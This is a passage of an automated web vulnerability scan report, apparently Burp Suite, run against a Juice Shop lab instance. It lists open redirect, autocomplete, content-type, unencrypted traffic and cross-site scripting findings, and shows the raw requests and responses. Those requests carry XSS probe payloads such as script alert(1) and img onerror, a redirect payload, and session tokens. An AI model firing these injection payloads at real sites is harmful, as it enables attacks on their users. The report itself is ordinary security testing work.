    </label>\n <input type="password" class="form-control input-sm" id="userPasswordRepeat" name="userPasswordRepeat" ng-model="user.passwordRepeat" required/>\n </div>
    ...[SNIP]...
    9. Open redirection
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /redirect

    Issue detail

    The value of the to request parameter is used to perform an HTTP redirect. The payload http://awpvwa81ir2/a?https://github.com/bkimminich/juice-shop was submitted in the to parameter. This caused a redirection to the following URL:

    Issue background

    Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

    References

    Request 1

    GET /redirect?to=http%3a%2f%2fawpvwa81ir2%2fa%3fhttps%3a%2f%2fgithub.com%2fbkimminich%2fjuice-shop HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 302 Found
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Location: http://awpvwa81ir2/a?https://github.com/bkimminich/juice-shop
    Vary: Accept
    Content-Type: text/plain; charset=utf-8
    Content-Length: 83
    Date: Sun, 15 Jan 2017 21:20:26 GMT
    Connection: close

    Found. Redirecting to http://awpvwa81ir2/a?https://github.com/bkimminich/juice-shop
    10. Password field with autocomplete enabled
    Previous  Next

    There are 3 instances of this issue:

    Issue background

    Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

    The stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.



    10.1. http://192.168.61.143:3000/dist/juice-shop.min.js
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    <div>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-info" ng-show="confirmation && !form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="currentPassword" name="currentPassword" ng-model="currentPassword" required/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="newPassword" name="newPassword" ng-model="newPassword" required ng-minlength="5" ng-maxlength="20"/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="newPasswordRepeat" name="newPasswordRepeat" ng-model="newPasswordRepeat" required/>\n </div>
    ...[SNIP]...
    10.2. http://192.168.61.143:3000/dist/juice-shop.min.js
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    </h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="error && !form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required/>\n </div>
    ...[SNIP]...
    10.3. http://192.168.61.143:3000/dist/juice-shop.min.js
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    </h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="form.$invalid && form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required ng-minlength="5" ng-maxlength="20"/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPasswordRepeat" name="userPasswordRepeat" ng-model="user.passwordRepeat" required/>\n </div>
    ...[SNIP]...
    11. Content type incorrectly stated
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.61.143:3000
    Path:   /socket.io/

    Issue detail

    The response states that the content type is application/octet-stream. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:

    Issue background

    If a response specifies an incorrect content type then browsers may process the response in unexpected ways. If the content type is specified to be a renderable text-based format, then the browser will usually attempt to interpret the response as being in that format, regardless of the actual contents of the response. Additionally, some other specified content types might sometimes be interpreted as HTML due to quirks in particular browsers. This behavior might lead to otherwise "safe" content such as images being rendered as HTML, enabling cross-site scripting attacks in certain conditions.

    The presence of an incorrect content type statement typically only constitutes a security flaw when the affected resource is dynamically generated, uploaded by a user, or otherwise contains user input. You should review the contents of affected responses, and the context in which they appear, to determine whether any vulnerability exists.

    Request 1

    GET /socket.io/?EIO=3&transport=polling&t=LcZwtbX&sid=_u0wPeQi82ftthU7AAAB HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Length: 5
    Access-Control-Allow-Origin: *
    Set-Cookie: io=_u0wPeQi82ftthU7AAAB; Path=/; HttpOnly
    Date: Sun, 15 Jan 2017 21:00:24 GMT
    Connection: close

    ...40
    12. Unencrypted communications
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /

    Issue description

    The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.

    To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

    Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

    References

    13. Cross-site scripting (stored)
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Firm
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the comment JSON parameter submitted to the URL /api/Feedbacks/ is copied into the HTML document as plain text between tags at the URL /api/Feedbacks/. The payload zepov<a>e9216 was submitted in the comment JSON parameter. This input was returned unmodified in a subsequent request for the URL /api/Feedbacks/.

    This behavior demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behavior and attempt to identify any unusual input validation or other obstacles that may be in place.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Issue background

    Stored cross-site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

    The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

    Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

    Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

    Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behavior can feasibly be used to compromise other application users.

    References

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"comment":"zepov<a>e9216","rating":0}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 168
    ETag: W/"a8-WH00EP0AVVjQTL1MG7jZVg"
    Date: Sun, 15 Jan 2017 21:11:27 GMT
    Connection: close

    {"status":"success","data":{"UserId":7,"comment":"zepov<a>e9216</a>","rating":0,"id":617,"updatedAt":"2017-01-15T21:11:27.000Z","createdAt":"2017-01-15T21:11:27.000Z"}}

    Request 2

    GET /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close

    Response 2

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 84437
    ETag: W/"149d5-lmpdGUcgEO4yJegPboBKxg"
    Date: Sun, 15 Jan 2017 21:11:28 GMT
    Connection: close

    {"status":"success","data":[{"id":1,"comment":"I love this shop! Best juice in town! Highly recommended!","rating":5,"createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"2017-01-15T20:58:05.000Z","User
    ...[SNIP]...
    datedAt":"2017-01-15T21:11:26.000Z","UserId":7},{"id":616,"comment":"alert(1)","rating":0,"createdAt":"2017-01-15T21:11:27.000Z","updatedAt":"2017-01-15T21:11:27.000Z","UserId":7},{"id":617,"comment":"zepov<a>e9216</a>
    ...[SNIP]...
    14. Cross-site scripting (reflected)
    Previous  Next

    There are 15 instances of this issue:

    Issue background

    Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

    References



    14.1. http://192.168.61.143:3000/api/BasketItems/ [BasketId JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The value of the BasketId JSON parameter is copied into the HTML document as plain text between tags. The payload nbxaa<script>alert(1)</script>lvtd4 was submitted in the BasketId JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":2,"BasketId":"4nbxaa<script>alert(1)<\/script>lvtd4","quantity":1}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 192
    ETag: W/"c0-2vE/cBQm1gGlWpAYvr/MAg"
    Date: Sun, 15 Jan 2017 21:07:08 GMT
    Connection: close

    {"status":"success","data":{"ProductId":2,"BasketId":"4nbxaa<script>alert(1)</script>lvtd4","quantity":1,"id":22,"updatedAt":"2017-01-15T21:07:08.000Z","createdAt":"2017-01-15T21:07:08.000Z"}}
    14.2. http://192.168.61.143:3000/api/BasketItems/ [ProductId JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The value of the ProductId JSON parameter is copied into the HTML document as plain text between tags. The payload cbv1z<img src=a onerror=alert(1)>kfy9x was submitted in the ProductId JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":2cbv1z<img src=a onerror=alert(1)>kfy9x,"BasketId":"4","quantity":1}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:07:01 GMT
    Connection: close
    Content-Length: 935

    {
    "error": {
    "message": "Unexpected token c",
    "stack": "SyntaxError: Unexpected token c\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    bleNT (_stream_readable.js:913:12)\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"ProductId\":2cbv1z<img src=a onerror=alert(1)>kfy9x,\"BasketId\":\"4\",\"quantity\":1}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.3. http://192.168.61.143:3000/api/BasketItems/ [quantity JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The value of the quantity JSON parameter is copied into the HTML document as plain text between tags. The payload g3fbk<img src=a onerror=alert(1)>ie33k was submitted in the quantity JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":2,"BasketId":"4","quantity":1g3fbk<img src=a onerror=alert(1)>ie33k}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
